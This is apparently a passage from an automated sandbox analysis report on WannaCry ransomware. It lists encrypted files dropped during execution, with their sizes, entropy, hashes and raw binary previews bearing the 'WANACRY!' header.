                                                                              Preview:WANACRY!.......Y......MW.........u.I........H.k+.U...6...[:H....|*...OP.9b..vrYQr.dp'p...!V2.?...1.... 7x2.)...g_.J..;H..z...I2G.KsW.......9Y-...:...+) ...X...vOsWk:=.B...4..I.1.&[k..9..;.....N}*W%./...z..i.[>..*......j(...r4.g.p9..F..d.......o.p.O<yt.=...x.................{.-.<H.{.Vs5.......5^.1.m..[....>..?._....EA`.Pl.9=8.W<${._..pd.rD1{l.5I$...V.r.`..$....[.......E@........s./.......Kk_.#..............;h./.9..a8...Y..b).>Ij.......;"Wy..rQ..D^/eK%....#...f.Q.`.x...n.`.....'.*.....Bz..5....t9c.,.....||.sh..|.T6q.,~..]&z}.:B.i.d$b...lR...}..]?{...Ha.....E4.A.NQ.(wn..*M...fw.}.(...]E...F&:.).35..m.....mG.A$D..\.A1";.^.'.j....?.%.\.j^........5u?..S\E...L..b.....`.....h.N5.3..r.......j...L.\.lO.?....,..g..{........)s..)b.....d/H>.A.`........b..z.f......}...=..n|.^P...\..;qt.I.nB....e.znT.JQ.M..*....eQ#...........U...C..}...M..S. H.Z...yY.e.l......ru{..+...g*Uk.t...-.HC.U..6.!..B.p.n.;t.@. .Bf.....@.y..."cm.......i...r.Pm.U...Q`...F.sjC.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.876030021147738
                                                                              Encrypted:false
                                                                              SSDEEP:24:bksnlfQKSgRkldtYB4TZSP8woHOUXrHMexUgIg4bp75YFYlK2uzg/0Y:bksnlf3SgRZ20PcHVXlIPRM32uzVY
                                                                              MD5:903E82FB6BF7BEC22E4C0FDFE6A508CF
                                                                              SHA1:0B877B5EC9B1CFE34D62F6D805A071E89F426DEF
                                                                              SHA-256:99D6E2998388280B2D8A1DEC46A5E0CA414DA376359B00BAE250FD92D1655BCC
                                                                              SHA-512:770EA2BE3220C99DF3EF138D1EE7427635F40730A706B7078F114B6C91960501DA3DBE4EBE092A71B386B2E55A650E9FC81BD94BC0CE9718B245CA041C64AD6B
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......Y......MW.........u.I........H.k+.U...6...[:H....|*...OP.9b..vrYQr.dp'p...!V2.?...1.... 7x2.)...g_.J..;H..z...I2G.KsW.......9Y-...:...+) ...X...vOsWk:=.B...4..I.1.&[k..9..;.....N}*W%./...z..i.[>..*......j(...r4.g.p9..F..d.......o.p.O<yt.=...x.................{.-.<H.{.Vs5.......5^.1.m..[....>..?._....EA`.Pl.9=8.W<${._..pd.rD1{l.5I$...V.r.`..$....[.......E@........s./.......Kk_.#..............;h./.9..a8...Y..b).>Ij.......;"Wy..rQ..D^/eK%....#...f.Q.`.x...n.`.....'.*.....Bz..5....t9c.,.....||.sh..|.T6q.,~..]&z}.:B.i.d$b...lR...}..]?{...Ha.....E4.A.NQ.(wn..*M...fw.}.(...]E...F&:.).35..m.....mG.A$D..\.A1";.^.'.j....?.%.\.j^........5u?..S\E...L..b.....`.....h.N5.3..r.......j...L.\.lO.?....,..g..{........)s..)b.....d/H>.A.`........b..z.f......}...=..n|.^P...\..;qt.I.nB....e.znT.JQ.M..*....eQ#...........U...C..}...M..S. H.Z...yY.e.l......ru{..+...g*Uk.t...-.HC.U..6.!..B.p.n.;t.@. .Bf.....@.y..."cm.......i...r.Pm.U...Q`...F.sjC.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.824973938901156
                                                                              Encrypted:false
                                                                              SSDEEP:24:JuOQrKZZi/RwZj2qRSAZG4Iwx71b15W0EHj8zrE6SKn:JTQGZZi/RwEqRDjIwxRb1YwzhSKn
                                                                              MD5:9A662F5885103E12713D681B42BD4C4C
                                                                              SHA1:C7B18D4D6F402BD633A9CE5C47728E97E8C55F5B
                                                                              SHA-256:772398DC50147D6A8481B1CC76E9E02EF3AEB3144A3BE413AF7473CD23F675E3
                                                                              SHA-512:E5ABF0D97E3171B6A99D1627389CFD43D97F617DABC4274ACA8EC9F4FCBE3D222E952C6791709A2371B54A29725F25B575AAA531D8EB357617855593FC47D19F
                                                                              Malicious:false
                                                                              Preview:..................g*..:...#....A0.&k.3S.,4-..H%y..H.......X?'.3.6.|f...}M..L..P..B.d.;L..Q.Uj.5..A_B..$:..-h.VN...2|...p..#.~&.P.%.h!J...............[......zS0.4.....U.`...G}?Nv~.?.Wn.....2.>_...P^....N..........5i....Tx.%.......... .d]..z...0uDQ...C%.....eepU}..."0...p....ug.!.\V.....k:....c?......5..l..A...s...S..M..._._:.*iAi..u.oO..J;...i.GJn.....D..f1..=.$..y.-7...*.... b.".....?.v.ps..lT.....s'.sW....f......|+....yF1..~.ZVZ?|..........:...o...{..SJ=.,...~=..fW[?.O_.q.j....5<..J....Tf..m..o.P.y.M....0.%....q.?...'...a"3b0X 0..e..,kVI.|.0.......Z2..t?C...&...b...w...#H.v..k.r>2..rPEO/..Y..s..G..i.....,WB[.bd..e. /.~...a.-&.e#.....8"......)...=.by..@..U> ......V.(.cB..E..L..u..Lk...H!.n%...............[K8.,%X...A.......".Hh5~..\..:h!*)...969&V..R)..d.qpA.\..b.#........?9..q.....o`...W..F..b...3...wJ$.%.-.g...B..F.)$....^..O.9.B.D7.zf..e.>.......:[.d...t}t..`-.c.J...!Np@.:.(H...A...~cag.$7.o..L.M..{.zQ......B1b.#.*.|....f"..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8593900696797006
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkagmG3GUb9SpfvZzqk7uA9Vs5KaDAmRz2lOx2nyT1hdAHGhndr4By6DGVw6bOJ4:bka/G3hSZBuk7uA9qefXnyT1fwGhS1k5
                                                                              MD5:9AE279EA750F5E91D119FC0ACD77466D
                                                                              SHA1:BE369C3DEDD9AAFCE1166996D46ACD9A61C101A8
                                                                              SHA-256:2776DAE9D8024A7B5F15257A2911C80C29AAB7B8C9B53CFAA5510E18601F5FD9
                                                                              SHA-512:67A59A1875C8283D9FDAA428F31B0FFD0D99D3BBFF4007CB737B332CA0FB51D05F578D5EBD1AC1ED7BC0FF89E4B0B98DA4B45FB1E5B14AFBFBFD62812D275ED1
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....}zD....F..;.F..^.jR..s..n...k..&Ww.?w.)?g3..%...#....6.r.m...2."....k..jG^T..<....\.....gY...5k.....h.........}..P.p6_22..H....>..#...u..b.....iA.J.........ljy.....5....0.....D....g,X.bX5x~y....#jkX|.n:.&Le'..W._..K..T...._...(3...........................d..|..-.'W...5.9.9K.Fu.4|.`.h.T...b.a.z.H...3.....y.L..R..CmP5O..v..E.m].5.Js....^..:.."...m..R...j.....Z..,.c.d7......:q.i...`...T......y.F..a.....U>..>yH.....Q.8..`.n.1v...C'.iE2xz..#.#K..J....:.r.M.....yS..7d..'..i.../..t../..^m.'..z...|.d|.M]......D....>0(...........aX....D|...,.E.C3V.{z<.=z....L...4....2..I.FG.Q...].VI..!E.....v6.'.<..Ja......j.1Z.I.'..oM.8>.V.....8..P...4..f...._..B....r)...h.A..\.......($.u..(Eq..J.j...]Q..G.T.....`.y.W."V...+He..&./.......!.<.o.(.8D..$.6...K.b.2.et. .B..Ia.)h.X..........:..Md.Z.Af.....8_..0..+..JI_.@y2.....C..E.....{=~.x.......u`.,os..L..YJ...%....p.W..?Ju.O.....Z.i\...+7..:..f....o..Z^q.'.. .|^.Qk.jsw..........7.O....S.5%@.M..d..k...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8593900696797006
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkagmG3GUb9SpfvZzqk7uA9Vs5KaDAmRz2lOx2nyT1hdAHGhndr4By6DGVw6bOJ4:bka/G3hSZBuk7uA9qefXnyT1fwGhS1k5
                                                                              MD5:9AE279EA750F5E91D119FC0ACD77466D
                                                                              SHA1:BE369C3DEDD9AAFCE1166996D46ACD9A61C101A8
                                                                              SHA-256:2776DAE9D8024A7B5F15257A2911C80C29AAB7B8C9B53CFAA5510E18601F5FD9
                                                                              SHA-512:67A59A1875C8283D9FDAA428F31B0FFD0D99D3BBFF4007CB737B332CA0FB51D05F578D5EBD1AC1ED7BC0FF89E4B0B98DA4B45FB1E5B14AFBFBFD62812D275ED1
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....}zD....F..;.F..^.jR..s..n...k..&Ww.?w.)?g3..%...#....6.r.m...2."....k..jG^T..<....\.....gY...5k.....h.........}..P.p6_22..H....>..#...u..b.....iA.J.........ljy.....5....0.....D....g,X.bX5x~y....#jkX|.n:.&Le'..W._..K..T...._...(3...........................d..|..-.'W...5.9.9K.Fu.4|.`.h.T...b.a.z.H...3.....y.L..R..CmP5O..v..E.m].5.Js....^..:.."...m..R...j.....Z..,.c.d7......:q.i...`...T......y.F..a.....U>..>yH.....Q.8..`.n.1v...C'.iE2xz..#.#K..J....:.r.M.....yS..7d..'..i.../..t../..^m.'..z...|.d|.M]......D....>0(...........aX....D|...,.E.C3V.{z<.=z....L...4....2..I.FG.Q...].VI..!E.....v6.'.<..Ja......j.1Z.I.'..oM.8>.V.....8..P...4..f...._..B....r)...h.A..\.......($.u..(Eq..J.j...]Q..G.T.....`.y.W."V...+He..&./.......!.<.o.(.8D..$.6...K.b.2.et. .B..Ia.)h.X..........:..Md.Z.Af.....8_..0..+..JI_.@y2.....C..E.....{=~.x.......u`.,os..L..YJ...%....p.W..?Ju.O.....Z.i\...+7..:..f....o..Z^q.'.. .|^.Qk.jsw..........7.O....S.5%@.M..d..k...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.827059988900444
                                                                              Encrypted:false
                                                                              SSDEEP:24:wQDQyAOUZhFDfYURFlxvbTT/WVJnTojr2OjcnynqC04yVxlm6/r7S6uUf4:9DQyFUZhFbYUDlx3LWar2OYn1Ceq6/Py
                                                                              MD5:53FA8033E4DAA45A5681B144866F7E9B
                                                                              SHA1:51871BC69B1586C5AAAC9B2D93B0C7DDF6306A92
                                                                              SHA-256:B759B863E9CBCBFFE6DFCADBD0D769B2A7E79B73BEB96AC647696D2F0307D939
                                                                              SHA-512:3D979F925ABAF4B7BC0F123A01B78945EC012A2884BC9E16B4DAF5745BBCA8B444606F0E1726529E28B4158D73FC1B04A4AD7781AF000674E067DA8198C4AE4C
                                                                              Malicious:false
                                                                              Preview:...n..|.N'T....Y.......mh....9!.^Qo..P?...>..6...c..EL.a.2..@.zr..(...Wt...^......-p...3,-..6.)..].&.......).onu..(......+8'on...S:...D6B._..*.p4.F..O...U..f..mLM.IM. ..j+w_.....^.G../.eX-)Nd....Iw/s..L*..b.R..=PT.R.>b.-...sO.wj.<.n...g..'s..#d..B...y..L.}.j...Kj...#.h.......UNQj#....%k..+C. i...1._)c...J.9;5.^.....].z.lL...P.~z..l~..\....v.!h..q.......6.....zX(..]...=!..@.@.L.1.GzPP..y....9....xT.k.o|.[.......~..b.T....|..f......B..............]...P.`..+S4.S...]BD.......f..D/9..l>..f].......J...PwDX.....t...p$..{.P5.....85.H............u?..D..\P..0.......a.k.N1.P..?..V...M............3=7sk...3..G...)...6x.ir....pt...9...d.._..Q......5.*[>......f.)5....Z......Y...Qn.5sA..?.....]Gh.>R..cP.5.m....Q..e.....\t<....S4x\.%$.....J.$o....^...A..$;~X.o.\u~.>.....5.g.b.2F.......U..m-...Z.P..)....]...!i7'*j...6KOu...P.)..K.....-!I....Y....);....&.04..u.W!..cE.L..-...6:..I.l..>.`/...'n.....^.fK.kN...[...{,...+LA...B.7..(.2.3..H....P]9...S....T.D1I.....2
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.833344350465939
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk58n+oJRszUhimg0pqxcdmiHteCxvnTeF7oQiUvDgR9X7KHY6ZlPDkj7w5ls:bk588U/pqjwvTeF7t8RZ246Z5ysls
                                                                              MD5:235219F3B325338A6E47B910CB946BF8
                                                                              SHA1:3666D8CB912A817E88D7BE88D595DB853A022C42
                                                                              SHA-256:6BA63808952721C4267CA4085E0F3130B230AEA43AFAD1AE8AA8E56A4D291789
                                                                              SHA-512:9684A0A36442539ED0A1227C9081B1E8BD5E00E7923F1C306ACF9E932919034871C57165386182EED731B1E84BFEE3D7E6B49B76C5175B1926C630C129F3476B
                                                                              Malicious:false
                                                                              Preview:WANACRY!.........+.j.*....)..h..$wi.N.9.,D.*.fO.......Z.YB@...[D.o../H.(....E...O._|.ryz..7......g..8...p9..}.`......+.&.H..b6..P...*....\/X..Y.#...KK,.,`.W.D.t.*|.v...g..,.%.^#/..bs.A5..4..f..x....,HR.q..`.2....a.......t.?.=..#\...B..6.r..[...8`................3..... ...b c......h.x.....fb.%.VV...r.jm..T.").b..S......../..l..._Jw...~...}v...%...T...e._.^[n'+z..K-......7.K.E5./.[..i....h..!.... G).*A(.</....s.{..Kb.*c!?...;.+...p..=[..X..I>..Jy...#M..0....[;y..O..F.\".TQSc....^....o.".<........#....R...U...0.....B...}.z....\....~ht`+j+B".]..I.|\..~.k..Wk.%"e.3..p3...&...x=........}.'.#.Q...g...>/..S.......a...Ug...A.U.M..c../....D...K.."(..}....I....GT.^fwx,..[./MVR...T...CsB..P:..t.u........5...+@J..+..Z. [...k.u.N.M0.e.K.2.B..9c....T.K..|..&..d...M.V.aL/.B.b.T.....=..8.]d...z.:9.{&......:...#.<5`.W#/...K_J6(~.FH.r...V..w]gV.D........K..W.N..o.{gU..yN..c....2...|n.[7*...t..A.%.L`.....hM.....O..h...E..(.....0G........l.w|.B...8mv/.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.833344350465939
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk58n+oJRszUhimg0pqxcdmiHteCxvnTeF7oQiUvDgR9X7KHY6ZlPDkj7w5ls:bk588U/pqjwvTeF7t8RZ246Z5ysls
                                                                              MD5:235219F3B325338A6E47B910CB946BF8
                                                                              SHA1:3666D8CB912A817E88D7BE88D595DB853A022C42
                                                                              SHA-256:6BA63808952721C4267CA4085E0F3130B230AEA43AFAD1AE8AA8E56A4D291789
                                                                              SHA-512:9684A0A36442539ED0A1227C9081B1E8BD5E00E7923F1C306ACF9E932919034871C57165386182EED731B1E84BFEE3D7E6B49B76C5175B1926C630C129F3476B
                                                                              Malicious:false
                                                                              Preview:WANACRY!.........+.j.*....)..h..$wi.N.9.,D.*.fO.......Z.YB@...[D.o../H.(....E...O._|.ryz..7......g..8...p9..}.`......+.&.H..b6..P...*....\/X..Y.#...KK,.,`.W.D.t.*|.v...g..,.%.^#/..bs.A5..4..f..x....,HR.q..`.2....a.......t.?.=..#\...B..6.r..[...8`................3..... ...b c......h.x.....fb.%.VV...r.jm..T.").b..S......../..l..._Jw...~...}v...%...T...e._.^[n'+z..K-......7.K.E5./.[..i....h..!.... G).*A(.</....s.{..Kb.*c!?...;.+...p..=[..X..I>..Jy...#M..0....[;y..O..F.\".TQSc....^....o.".<........#....R...U...0.....B...}.z....\....~ht`+j+B".]..I.|\..~.k..Wk.%"e.3..p3...&...x=........}.'.#.Q...g...>/..S.......a...Ug...A.U.M..c../....D...K.."(..}....I....GT.^fwx,..[./MVR...T...CsB..P:..t.u........5...+@J..+..Z. [...k.u.N.M0.e.K.2.B..9c....T.K..|..&..d...M.V.aL/.B.b.T.....=..8.]d...z.:9.{&......:...#.<5`.W#/...K_J6(~.FH.r...V..w]gV.D........K..W.N..o.{gU..yN..c....2...|n.[7*...t..A.%.L`.....hM.....O..h...E..(.....0G........l.w|.B...8mv/.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.811356510055264
                                                                              Encrypted:false
                                                                              SSDEEP:24:Iii+Rdn9NS35NUmtNG5CPkPs81LaeJ9lgp94NFPOYPzBDE7X:Iiiuna33UOkPs8haeJ9e4FPO0BuX
                                                                              MD5:76FEB7A2983BEF05056F09DCC658D9C6
                                                                              SHA1:8BAE42C75FB2DCF3E1978EE1A08E6216FC676DD9
                                                                              SHA-256:B0BC09618A502B62A04ACAE65D023D24D8B29B36168D293DF4E03B62B0CF8A1A
                                                                              SHA-512:463727AE051DD5A4872B1C3D3FC78D0A497261D45044327B9264466DDAE9E1A97FF2E2C990B84A6C28AC11152022B26E637DA97A6A6D4B3CA6834522CCE84A06
                                                                              Malicious:false
                                                                              Preview:v..:.e.S..R. V.g..o......x.!Z..."..}..2`.{.i.hc6I..b...;.3...-...m..V....{z#.......sB...Z.'!..D..9;K....%..(`..w.W...@Q}...vc.P...6.0>.>IQ....6....mT.*.L].8.2.........l..L..........0......;.`....A.LwW......26...u..Y.&...zj.M>*...[0.u.Wv...Q..K,j....?.R.U......gA.Q.Q.m~.....YQ.c.$m.%.H..#...(...r.h.Xc.Q.j]c.<..^.. [....y..oL..Q<.bY.=..K.........mSc`q......l.s..Ic..v..~H(...(......>...[<Q...Mt.B.p.kren..s.o.7.u9....E...C}|....:t^.%[...j..\L".y..;...4.S:.).*......".,...l4.4.!._.B.9.IF.*I8.v#/.,.e..:..;%h.0.UY.*.....8....T).8....)8d{~UO. 5#..).&=@.36@.}..|oH..2.&..*Y 52.......5.L..sZ..~..e...b.(Mg.|.b.+!.....*.h....9.P"....j._.y2A.;J..x.m....@QO...K....z&K3..,...E?.n..;.&Z2l..*...[...*9.G.>.2&.....(..*AM0u[\.....w1l....r....].O...b...q..s..3....._.c..@H..?0...3.....,...V.dp....7....\..`;.W.aa..S.w...W....`M.sx..6..B...8...)..f.....U...e..Z.._s'V1..v....{.........#.~oQ....&....).....|.H./.....&.'..I....AhT;....o.S...~.q$..u_......Y.[k7c.0.`..Dv..J.n)
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.85110636814177
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkOaiF/xP320AtOdva2SDfupMFuCLdde/AGy7TrLr6sUiRMxPeY:bkOaq5wtMa2SDfWyre4GurLrL5MeY
                                                                              MD5:D5A5D02FCEE248F013F55439FDFD9618
                                                                              SHA1:DF325A3D35BEE5A128D18A066AC5F32DC0B4D0F0
                                                                              SHA-256:BDE0B7313C92412B9645547A66CEF3F5D963A60D81A989B253A7C89CD7D9093A
                                                                              SHA-512:657ECBBAE178D5E974AF0821B9510C9CA90EB4526D64DFB93FDCDA59F784FBC1608B50F3DDCF210BD7C9643CDCBE95B52C8B4022BA7E9E27A2E9BA6BB1A98401
                                                                              Malicious:false
                                                                              Preview:WANACRY!........BC#?/*~..{.#W2...l..#.P..X.".@g.....Y89.~y:..6.n!g.x.&.K....AJ....e@.o.k......9."..o...kuF$sr5...=hlC\.(...}=..TY ..%Y...6t1@.......i.N..~.........9}....U.*...ho...;m..Xa...Z...q...$`..C......+T..h..hQ....O...B..?.N.....ZVu;.M.I.....~j. .b.............o..u/.y.Y#......e.....R.~*...Y_.W.F...f..._;......b.A.....Z.c.e.....MQ~7.pK.Gh.Yz..S......So.X?...E......e1../Hg.^...u( ..N......y.pl..e.s.^+....(o...........N.& pw.<.0.x...9....sK.....#[Z..76..;.*..8....&@.A..D..@....F.,..q..E..>..4...............,.&{4-../op.O.>.+...q.`.......xk...G,..+.U..=.I.u.=?g...g...#..m9.7..z..D./N..R..7:...$.....3G...b8|...r.%..f"c...I.._n[.X..!j}7.......w...|.]."2.N.u.f.$.\~..e..C.....O..E...UoS-./n=.].........\.a.v....f.L#.?.V.DC..@.*...5..:....!....MR...~A....#q...ra..-..k..!u..[..8;.90E.."Q^@..A{./...G.Mn.^........c.R.X.4.o.;...^..K.....o..,WC.K....D0R.R....r`....Y.p..s{..3M.t.w..6.\..aT.w..A....H..0....82..E...).^.w-.SO..)..:..`?AU.C.O^.H.a1p
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.85110636814177
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkOaiF/xP320AtOdva2SDfupMFuCLdde/AGy7TrLr6sUiRMxPeY:bkOaq5wtMa2SDfWyre4GurLrL5MeY
                                                                              MD5:D5A5D02FCEE248F013F55439FDFD9618
                                                                              SHA1:DF325A3D35BEE5A128D18A066AC5F32DC0B4D0F0
                                                                              SHA-256:BDE0B7313C92412B9645547A66CEF3F5D963A60D81A989B253A7C89CD7D9093A
                                                                              SHA-512:657ECBBAE178D5E974AF0821B9510C9CA90EB4526D64DFB93FDCDA59F784FBC1608B50F3DDCF210BD7C9643CDCBE95B52C8B4022BA7E9E27A2E9BA6BB1A98401
                                                                              Malicious:false
                                                                              Preview:WANACRY!........BC#?/*~..{.#W2...l..#.P..X.".@g.....Y89.~y:..6.n!g.x.&.K....AJ....e@.o.k......9."..o...kuF$sr5...=hlC\.(...}=..TY ..%Y...6t1@.......i.N..~.........9}....U.*...ho...;m..Xa...Z...q...$`..C......+T..h..hQ....O...B..?.N.....ZVu;.M.I.....~j. .b.............o..u/.y.Y#......e.....R.~*...Y_.W.F...f..._;......b.A.....Z.c.e.....MQ~7.pK.Gh.Yz..S......So.X?...E......e1../Hg.^...u( ..N......y.pl..e.s.^+....(o...........N.& pw.<.0.x...9....sK.....#[Z..76..;.*..8....&@.A..D..@....F.,..q..E..>..4...............,.&{4-../op.O.>.+...q.`.......xk...G,..+.U..=.I.u.=?g...g...#..m9.7..z..D./N..R..7:...$.....3G...b8|...r.%..f"c...I.._n[.X..!j}7.......w...|.]."2.N.u.f.$.\~..e..C.....O..E...UoS-./n=.].........\.a.v....f.L#.?.V.DC..@.*...5..:....!....MR...~A....#q...ra..-..k..!u..[..8;.90E.."Q^@..A{./...G.Mn.^........c.R.X.4.o.;...^..K.....o..,WC.K....D0R.R....r`....Y.p..s{..3M.t.w..6.\..aT.w..A....H..0....82..E...).^.w-.SO..)..:..`?AU.C.O^.H.a1p
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.820473708302825
                                                                              Encrypted:false
                                                                              SSDEEP:24:dr9tkIhqBDaQ/Leo7OjBOSKZSA6BaMxvRB07JUi:dr9tkfyo7O0ZSdfVb4n
                                                                              MD5:9DF9725D733BA8C2439F768BA4F8377B
                                                                              SHA1:512B7FE8874577D2F8F20AF295440227618F75FA
                                                                              SHA-256:BB9DA944514C59A4A3C0EDFE4D75C0FAE70806C34FBF0DF131E081008C92A28C
                                                                              SHA-512:898138B4B532A6B0A11A9D524DEB6AA71B65A6FB733055D2B7D9D1B1CE5522E1ACCF7F1AC3B98F225CC6B249FDA510D40ABA5A217E2208D2C9C598A0BC5CB587
                                                                              Malicious:false
                                                                              Preview:Pz..._hW.sG^. c>.^.?y^.O..%l..@...w..y...s..d..Op^..wiR..G.Y..".#.Dlx.$.O.l..J..P.I_-..7K)(....G..C.w..U..['.\..PE....s^..cn.-\..C.e..l.'.qFY*....zZz....qK..g#...]A.V.[........$....z.?...m...G.cu.N..n,... .gs^...k.=).sW.Wm.z.o..*.de.."-...%..y.E.>f...M ...;|_Nbp...Z0b..r.Q.`.....`...OG..J...g......).=.......Rz......V...!KZW..6G..DrF|..P.Z.7...b..h.....WJ.D...=^..t...;i.....fl..L:.-....{`\..kp.'a.........v..$..)..v...6.h..0%H.....Pd...K.f._C3..Rb... I..\.1(Y.I.[.8..o.O...G...^....A.11............z.jD...f74o)......*..^.,.&..G...q-.....\..OH...m."..vV.].|.......{j.X8.`,t.b..u..`...~.&.....J.m]...pq7Bf.\e..SIj.....CnWoK.p....dN.....6i..X.(.t....e..o.|i[p<:..C4.4..+......k..O.+.`../..QT,.i.6.)H...aN...<,($-^mK.f.5....<*....,B..z....l.....9......'....1J.../........?@....FBe.......b.7A...Q5Ju....@..f.O.....8/]...`<D...t.....o...;$....('....6.sB...N.<Hs.K.L...G. ............Q.H...].O.S...8j.~^.',0..x.3.J.....S....+.N.b.8..H.V.*;g4...&.-....u>.y...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.831639878709562
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkUdFhYVCUTkLd163KQCctmyYBmrpfZoO+fBGWUfipG+BGhfS+1enYRK/:bk4FhWNUd6KQCifZTXsG+B1+1e5
                                                                              MD5:BE62FCB7AD1803BA4DB6B1751F5A68CD
                                                                              SHA1:FEE059722191A3F3E2CEA6F22008837FDE7DECA3
                                                                              SHA-256:EF4D9BB6CBF8A44D228182DC97F81C78A71139C58A69CDE688F62E9E7A3DC1E8
                                                                              SHA-512:7F69F4710309B6100E4425BFFFBDC4E09DE23D9B814B7C106B84D1ED71469AA047F5F182D4D5FC0374CB252AF35B49A44DC273B4F9B448462F5677930F6E7CB0
                                                                              Malicious:false
                                                                              Preview:WANACRY!....r...!2jZ$.."&.......H.A..B..bt.N...Ay....\...j..".@.......H....g..r...<r...q... .`.Y.5=n9x.G.....%{.....M.m.,".Y.S..B?oshC..Ee#X.G.S].X.|.{^.#......[....N.g'...w./.-......RS......A.A<.....t.`. .....W...rM+..9[1..Ve.O..........7Dqy.e.C...]..................r..p.l.*......T.D._..&..T..h............)V...U.E/Z...6....zv}.Q...$.QXL.....^.M.]R.J.{...,]....~..zy..$`...J.0.....G....d.v5..n.,C .....D4x...*A....,\X...[.F.i?.#..h..,.sB..g..|.F<yr.....4.].l!/p.3.7EI.5..t.._.':.*..]!.. A(....A..0a.,.%.aw.o.+7.o..9n..O..zr&..........j.R.V...].U..>..P.U..p..Du..C.;..$..f.... .....[.T..%e.q...oOv....U...~.fm..m.l..O .*Q......K.......y...9..^..t.......`.v.m.\.....3..?r.....K.2...r.f...uv..w@*..B....t..Q.....%..S@P?C..?...JWU.0..1z\O.-k'...k.s.Ud...$w.E....b%3..o....ga)......S.y"t..u.......S@.q../.........WTq.Z...5....V....W.......r....\....b.e..UM...D.$Y..y`..g..s..N.......'.X..).}..b+VGe......'.)..|V.y..;mDpw' \L....0.M.n...+.}...[x...!.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.831639878709562
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkUdFhYVCUTkLd163KQCctmyYBmrpfZoO+fBGWUfipG+BGhfS+1enYRK/:bk4FhWNUd6KQCifZTXsG+B1+1e5
                                                                              MD5:BE62FCB7AD1803BA4DB6B1751F5A68CD
                                                                              SHA1:FEE059722191A3F3E2CEA6F22008837FDE7DECA3
                                                                              SHA-256:EF4D9BB6CBF8A44D228182DC97F81C78A71139C58A69CDE688F62E9E7A3DC1E8
                                                                              SHA-512:7F69F4710309B6100E4425BFFFBDC4E09DE23D9B814B7C106B84D1ED71469AA047F5F182D4D5FC0374CB252AF35B49A44DC273B4F9B448462F5677930F6E7CB0
                                                                              Malicious:false
                                                                              Preview:WANACRY!....r...!2jZ$.."&.......H.A..B..bt.N...Ay....\...j..".@.......H....g..r...<r...q... .`.Y.5=n9x.G.....%{.....M.m.,".Y.S..B?oshC..Ee#X.G.S].X.|.{^.#......[....N.g'...w./.-......RS......A.A<.....t.`. .....W...rM+..9[1..Ve.O..........7Dqy.e.C...]..................r..p.l.*......T.D._..&..T..h............)V...U.E/Z...6....zv}.Q...$.QXL.....^.M.]R.J.{...,]....~..zy..$`...J.0.....G....d.v5..n.,C .....D4x...*A....,\X...[.F.i?.#..h..,.sB..g..|.F<yr.....4.].l!/p.3.7EI.5..t.._.':.*..]!.. A(....A..0a.,.%.aw.o.+7.o..9n..O..zr&..........j.R.V...].U..>..P.U..p..Du..C.;..$..f.... .....[.T..%e.q...oOv....U...~.fm..m.l..O .*Q......K.......y...9..^..t.......`.v.m.\.....3..?r.....K.2...r.f...uv..w@*..B....t..Q.....%..S@P?C..?...JWU.0..1z\O.-k'...k.s.Ud...$w.E....b%3..o....ga)......S.y"t..u.......S@.q../.........WTq.Z...5....V....W.......r....\....b.e..UM...D.$Y..y`..g..s..N.......'.X..).}..b+VGe......'.)..|V.y..;mDpw' \L....0.M.n...+.}...[x...!.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.82955093260985
                                                                              Encrypted:false
                                                                              SSDEEP:24:MB591TpxGnKQKgXfTDg2TrLBji5o4GPlsnrmkpBeJb:an1TpxbdAng2TrVjao7omke9
                                                                              MD5:C57D70DD0880B2BE984167655990A782
                                                                              SHA1:2FF1C83D8080A26B56D224A735012773912AE713
                                                                              SHA-256:FE53972F80598FE134CBF2136B395D6035ABB89A3329ED68797B24E8FF548BF3
                                                                              SHA-512:75DCE3305DBB9B0258E4AEF9C14FF930B29BF5F07A32E16B11643203ED003F3ACFF5813F78C157B2B20D6324EF7C9BEAF7002A1F9C415D8F7A33F91CEA2C5935
